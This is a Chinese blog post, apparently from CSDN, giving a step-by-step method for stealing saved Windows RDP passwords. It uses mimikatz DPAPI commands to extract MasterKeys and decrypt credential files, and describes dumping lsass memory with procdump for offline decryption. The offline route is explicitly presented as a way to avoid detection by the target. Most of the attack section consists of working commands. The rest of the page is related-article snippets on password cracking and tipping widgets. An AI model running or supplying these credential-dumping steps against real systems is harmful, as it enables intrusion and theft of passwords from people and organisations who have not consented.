内网渗透-Windows RDP凭证的抓取和密码破解测试的方法

最新推荐文章于 2024-05-15 18:18:40 发布
最新推荐文章于 2024-05-15 18:18:40 发布
阅读量910 收藏 8
点赞数 20
分类专栏: 内网渗透实战 文章标签: 安全性测试 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/137749342
版权

Windows RDP凭证的抓取和密码破解测试的方法

文章目录

破解原理

Credentials的解密是Windows系统信息收集中非常重要的一环,其中包括各类敏感、重要的凭证 (这个可以理解为密码) , 接下来我们就讲解RDP凭证的抓取和破解。

在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地, 由于Windows还需要解密从而使用,所以这个过程是可逆,也正因为这一缘由,我们只要拿到MasterKey就能将密码解出来。在这里插入图片描述

凭证的查看

查看凭证命令

查看mstsc的连接记录
cmdkey /list
查找本地的Credentials
dir /a %userprofile%\appdata\local\microsoft\credentials*

在这里插入图片描述

在这里插入图片描述

在线破解

1、使用mimikatz获取该文件的MasterKey的guid

mimikatz dpapi::cred
/in:C:\Users\Administrator\appdata\local\microsoft\credentials\FF22A1FDA68FD8515B52C534E8655421

所以用于加密凭据文件FF22A1FDA68FD8515B52C534E8655421B的MasterKey的guid就是:{c271c658-e61b- 4023-95d2-dfbf18b0aa33},所以我们只要从内存中找到这个guid对应的MasterKey的值即可
在这里插入图片描述

2、找到内存中对应的MasterKey

mimikatz sekurlsa::dpapi

3、最后打开mimikatz通过MasterKey值去解密凭据文件
dpapi::cred /in:凭据文件路径 /masterky:masterkey值

mimikatz dpapi::cred
/in:C:\Users\Administrator\appdata\local\microsoft\credentials\FF22A1FDA68FD8515B52C534E8655421 /masterkey:b3354c56cd35630d10aa7477c3d16e9b94587f1dc6f9d0c8fcb72a5e4a25c8aab8fa242194666c4cc4be9 485c31af555b01a49abbfbb8cc1c00d209da624f33c

离线破解

由于我们不能保证我们的mimikatz是免杀状态,为了避免被对方发现,我们可以离线解密从而达到获取密码的目的其实很简单,就是把目标的文件和内存下载回来,在vps或本机上进行mimikatz解密即可。
1、下载目标内存
procdump.exe ‐accepteula ‐ma lsass.exe lsass1.dump 导出lsass

在这里插入图片描述
2、下载目标的Credentials文件
在这里插入图片描述
3、用mimikatz载入dump回来的内存
Sekurlsa::minidump lsass1.dump
在这里插入图片描述
4、获取Credentials的GUID
dpapi::cred /in:FF22A1FDA68FD8515B52C534E8655421
在这里插入图片描述
5、获取内存中所有的MasterKey
sekurlsa::dpapi

在这里插入图片描述
6、利用MasterKey解密

dpapi::cred /in:FF22A1FDA68FD8515B52C534E8655421
/masterkey:b3354c56cd35630d10aa7477c3d16e9b94587f1dc6f9d0c8fcb72a5e4a25c8aab8fa242194666c4cc4be9 485c31af555b01a49abbfbb8cc1c00d209da624f33c

在这里插入图片描述

炫彩@之星
关注
  • 20
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
内网渗透(二十八)之Windows协议认证和密码抓取-Windows RDP凭证抓取密码破解
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 396
Credentials的解密是Windows系统信息收集非常重要的一环,其包括各类敏感、重要的凭证(这个可以理解为密码),接下来我们就讲解RDP凭证抓取破解 在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地,由于Windows还需要解密从而使用,所以这个过程是可逆,也正因为这一缘由,我们只要拿到MasterKey就能将密码解出来。
最新Web渗透测试——密码暴力破解工具的使用!看完你怕了吗?
程序员小濠
05-10 1730
 大家好!今天我们讲暴力破解,有人可能会有疑惑,密码到底设置得多复杂才算是安全,其实这就像是问,是先有的鸡还是先有的蛋,都是没有确切的答案的,理论上说无论你密码设置的多么复杂,都有可能被破解,这主要看的就是密码字典的大小,我曾经见到过一个28G的密码字典,如果再配合上暴力破解工具,我想密码破解只是时间的问题吧。    因此今天我们不讲如何设置密码,我们就讲讲这些暴力破解工具的使用,以便我们理解暴力破解的原理,进而制定更加安全合理的防暴力破解的策略,下面我们言归正传。   Hydra   hy..
利用mimikatz查看rdp连接密码【渗透测试】_mimikatz pth rdp
2401_84969443的博客
05-14 689
szDescription : 本地凭据数据。
RDP密码凭据抓取
最新发布
Y22Lee的博客
05-15 458
命令:dpapi::cred /in:凭据文件路径 /masterkey:masterkey值。
渗透测试--6.1.aircrack-ng破解wifi密码
我是个好人呀,????
05-18 9005
是一个完整的工具来评估Wi-Fi网络安全套件(ex.1)。
rdp文件密码的生成
06-02
rdp文件有一行密码说明,利用这个文件可以生成所需要的密码
密码测试工具
04-08
汉化版免安装,解压后打开EWSA.exe 使用说明:软件语言默认为英文,切换到文版的方法如下: 点击菜单Options---->Language--->简体文版; 是一款在WINDOWS操作系统下破解WAP的工具,功能非常强大,而且支持GPU处理器; 破解速度更快。
RDP文件密码加解密
12-13
用于远程连接的.rdp文件的password 51:b: 这个设置的明文密码和二进制哈希转换
项目集和项目估算-RDP-GJB5000A
01-27
相信很多人对项目管理已经有相对比较深入的理解,且实际运用到日常科研创新项目的管理;但提起项目集管理,估计大部分就会有点茫然了,什么是项目集?如何有效管理? 其实,什么是项目集,业界相对通俗易懂的解释...
nvidia-opengl-rdp 英伟达显卡 rdp 远程桌面 OpenGL补丁
10-31
nvidia发布的 让windowsrdp远程桌面环境也可以使用 GrForce GPU来做终端桌面的OpenGL 加速补丁
基因测序数据库-16s-sliva-rdp库和minikraken库
12-15
基因测序数据库-16s-sliva-rdp库和minikraken库
rdp密码加密.zip
11-12
rdp.exe是一款windows RDP文件对密码进行加密的工具 windows远程桌面做自动化链接的工具时,无法使用原始明文密码,需要使用此工具对密码进行加密,并添加至自定义的rdp配置文件 ------分隔符 ------ username:s:用户名 password 51:b:rdp加密后的密码
RDP文件密码加密、解密算法.rar
06-03
Windows远程登录使用的是一个rdp后缀的配置文件,rdp文件仅仅为简单的配置文件,可以配置远程主机的IP地址、用户名和密码。而密码是以密文形式配置在rdp文件的,本程序可以对远程登录的密码进行加密和解密。加密后的密文可以放在rdp配置文件里面,这样就可实现不输入用户密码自动远程登录。 完整的C#代码,vs2008工程,可编译和运行。 可以使用RDP.exe来验证加密后的密文是否正确。
rdp密码生成工具
09-11
rdp密码加密解密工具
RDP-OTP:Windows远程桌面的一次性密码身份验证
05-16
RDP OTP Windows远程桌面环境的一次性密码身份验证它是如何工作的? 每次登录到远程桌面环境时,密码都会自动更改。 然后,使用个人RSA密钥对的公共密钥对新密码进行加密。 密钥对的唯一用途是用于发送一次具有更高...
Web 攻防之业务安全:暴力破解 测试.
网络安全领域___专研者.
02-05 9238
暴力破解的概括:就是攻击者使用自己的账号和密码作为一个字典,一个一个去尝试,看看是否能够登录成功,因为理论上来讲,只要字典足够庞大,就可以破解成功的!
远程桌面,RDP文件密码加密、解密算法(C#)
热门推荐
u010007460的博客
02-19 1万+
背景:由于项目需要,使用RDP文件来远程登录,需要实现点击rdp文件就可以自动连接远程桌面,并且实现自动登录功能!自动登录!自动登录! 自动登录:密码需要经过加密,本文的核心!!!废话少说,看代码! 1、首先添加引用是必须的!       using System;       using System.Security.Cryptography; 2、核心算
万能网站密码爆破测试工具,太强了 !
m0_60571990的博客
12-15 2445
万能网站密码爆破测试工具,太强了 !
密码暴力破解、渗透测试流程
weixin_55932038的博客
06-07 1946
字典破解,实施破解时采用“可能”的密码,比如生日、单词、常用数字,可手动或通过工具编写,也可以通过分享获取社工密码库(最常见的密码是“password”、“123456”、“123456789”)示例3:crunch 8 8 -t A%% -o pass.txt // 以A开头2位数字组成的3位密码,保存为pass.txt文件。暴力破解,也称为“密码穷举”,列出各种可能的密码,用来尝试去访问目标系统,理论上任何密码都可以用这种方法破解,不过越复杂的密码破解耗时也越长。
nvidia-opengl-rdp
09-07
nvidia-opengl-rdp是指NVIDIA的OpenGL远程显示协议。它是一种用于在远程显示设备上渲染OpenGL图形的通信协议。 在传统的图形渲染,图形处理单元(GPU)将图形数据生成为图像,并将其发送到显示设备进行显示。然而,当我们需要在远程设备上进行图形渲染时,这样的传统渲染方法就不再适用。 nvidia-opengl-rdp通过使用网络进行通信,将图形渲染任务从本地GPU转移到远程显示设备的GPU上。这就意味着我们可以在本地设备上操作图形渲染任务,而实际的渲染工作将在远程设备上进行,最终将图像数据传输回本地设备进行显示。这种方法能够极大地提高远程设备上的图形渲染性能,同时减轻本地设备的负担。 使用nvidia-opengl-rdp的好处之一是它可以在不同操作系统之间进行跨平台渲染。无论是在Windows、Linux还是其他操作系统上,只要支持OpenGL协议,就可以使用nvidia-opengl-rdp进行远程图形渲染,这为多平台应用程序的开发提供了便利。 总的来说,nvidia-opengl-rdp是一种用于在远程设备上进行OpenGL图形渲染的通信协议,它通过网络传输图形数据,以实现在不同操作系统之间进行跨平台渲染。它的使用可以极大地提高远程设备上的图形渲染性能,并为多平台应用程序的开发提供便利。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值